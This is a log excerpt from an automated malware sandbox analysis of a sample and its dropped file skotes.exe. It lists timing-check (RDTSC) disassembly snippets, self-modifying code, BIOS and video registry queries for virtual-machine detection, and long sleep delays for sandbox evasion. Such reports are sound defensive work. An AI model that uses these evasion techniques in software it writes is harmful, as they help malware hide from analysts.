Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703FE second address: 4D70426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD14h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7027C second address: 4D70280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70280 second address: 4D70286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70286 second address: 4D702D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB19901BDDDh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov di, ax 0x00000017 pushfd 0x00000018 jmp 00007FB19901BDE8h 0x0000001d sbb ch, FFFFFFC8h 0x00000020 jmp 00007FB19901BDDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702D5 second address: 4D702D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702D9 second address: 4D702DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702DF second address: 4D702E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1001F second address: 4D10025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10025 second address: 4D1002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1002B second address: 4D1005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB19901BDDFh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB19901BDE5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70639 second address: 4D70643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 56954DACh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70643 second address: 4D706BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 mov dl, E2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB19901BDE5h 0x00000012 and ax, BE36h 0x00000017 jmp 00007FB19901BDE1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FB19901BDE0h 0x00000023 and esi, 40AB9D58h 0x00000029 jmp 00007FB19901BDDBh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007FB19901BDE6h 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706BF second address: 4D706C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706C3 second address: 4D706E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706E0 second address: 4D706E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706E6 second address: 4D706EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706EA second address: 4D706EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706EE second address: 4D70745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007FB19901BDDDh 0x00000017 adc si, 23B6h 0x0000001c jmp 00007FB19901BDE1h 0x00000021 popfd 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 jmp 00007FB19901BDDEh 0x0000002b call 00007FB19901BDD9h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70745 second address: 4D70749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70749 second address: 4D7074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7074F second address: 4D707D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB19901BD12h 0x00000008 pop ecx 0x00000009 call 00007FB19901BD0Bh 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FB19901BD16h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d movsx ebx, si 0x00000020 pushfd 0x00000021 jmp 00007FB19901BD0Ah 0x00000026 or esi, 07E1AAC8h 0x0000002c jmp 00007FB19901BD0Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [eax] 0x00000035 jmp 00007FB19901BD19h 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D707D6 second address: 4D707DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D707DA second address: 4D707E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7086F second address: 4D70873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70873 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D205C9 second address: 4D2060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB19901BDE9h 0x00000009 sbb ax, 3C66h 0x0000000e jmp 00007FB19901BDE1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 mov esi, 09470FA1h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2060F second address: 4D20614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20614 second address: 4D20629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, E79Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20629 second address: 4D20681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 jmp 00007FB19901BD15h 0x0000000e push 35374227h 0x00000013 jmp 00007FB19901BD17h 0x00000018 add dword ptr [esp], 420A7DF1h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB19901BD15h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20681 second address: 4D206BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 49D0ADB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007FB19901BDE8h 0x00000016 pop ecx 0x00000017 mov esi, edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D206BA second address: 4D206BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D206BF second address: 4D20719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB19901BDE8h 0x0000000a or ax, 5B18h 0x0000000f jmp 00007FB19901BDDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor dword ptr [esp], 3EE803B1h 0x0000001f jmp 00007FB19901BDE6h 0x00000024 mov eax, dword ptr fs:[00000000h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20719 second address: 4D2071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2071D second address: 4D20723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20723 second address: 4D20746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD15h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20746 second address: 4D207DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB19901BDE7h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FB19901BDE9h 0x0000000f and ax, 88D6h 0x00000014 jmp 00007FB19901BDE1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], eax 0x00000020 jmp 00007FB19901BDDEh 0x00000025 sub esp, 1Ch 0x00000028 jmp 00007FB19901BDE0h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FB19901BDE0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB19901BDDDh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D207DC second address: 4D207F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D207F1 second address: 4D20834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov cx, 8183h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FB19901BDE6h 0x00000017 and ah, 00000048h 0x0000001a jmp 00007FB19901BDDBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20834 second address: 4D20856 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB19901BD17h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20856 second address: 4D208AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FB19901BDDEh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FB19901BDE0h 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx edi, ax 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 mov eax, 7FA99D7Bh 0x00000025 popad 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edi, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D208AD second address: 4D20907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FB19901BD10h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FB19901BD10h 0x0000001b xor eax, ebp 0x0000001d jmp 00007FB19901BD11h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov si, dx 0x00000029 movsx ebx, ax 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20907 second address: 4D2090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2090D second address: 4D20911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20911 second address: 4D209A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB19901BDDFh 0x00000013 and eax, 1DE45D2Eh 0x00000019 jmp 00007FB19901BDE9h 0x0000001e popfd 0x0000001f mov ax, 43B7h 0x00000023 popad 0x00000024 nop 0x00000025 jmp 00007FB19901BDDAh 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d jmp 00007FB19901BDE0h 0x00000032 mov dword ptr fs:[00000000h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ch, bl 0x0000003d call 00007FB19901BDE6h 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D209A2 second address: 4D209BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D209BC second address: 4D20A41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB19901BDE3h 0x00000008 sbb ax, 32AEh 0x0000000d jmp 00007FB19901BDE9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FB19901BDE0h 0x0000001b xor ch, 00000028h 0x0000001e jmp 00007FB19901BDDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+10h] 0x00000028 pushad 0x00000029 call 00007FB19901BDE4h 0x0000002e mov esi, 20A24021h 0x00000033 pop ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FB19901BDDDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A41 second address: 4D20A71 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 542CB6F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov al, 13h 0x00000010 popad 0x00000011 popad 0x00000012 jne 00007FB20B63AFD7h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB19901BD16h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A71 second address: 4D20A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A83 second address: 4D20A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ah, B7h 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A9E second address: 4D20AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BDE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20AD4 second address: 4D20AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2444F35Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [esi] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB19901BD13h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2011D second address: 4D20121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20121 second address: 4D20127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20127 second address: 4D2017A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64B4h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB19901BDE2h 0x00000014 sbb si, 7268h 0x00000019 jmp 00007FB19901BDDBh 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 jmp 00007FB19901BDE2h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2017A second address: 4D2017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2017E second address: 4D20184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: A3F3A5 second address: A3F3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA7D second address: BADA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA81 second address: BADA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA8C second address: BADAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDE4h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADAAB second address: BADAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADAAF second address: BADAD7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FB19901BDE7h 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB79E7 second address: BB79F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB79F0 second address: BB79FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB7B5C second address: BB7B7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BD13h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB7B7B second address: BB7B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: E6ECB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 10379C9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 1020BE5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Special instruction interceptor: First address: 1097F82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A3ECB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C079C9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BF0BE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C67F82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe Code function: 0_2_04D70770 rdtsc 0_2_04D70770
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 459
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3796 Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep count: 459 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep time: -13770000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6320 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
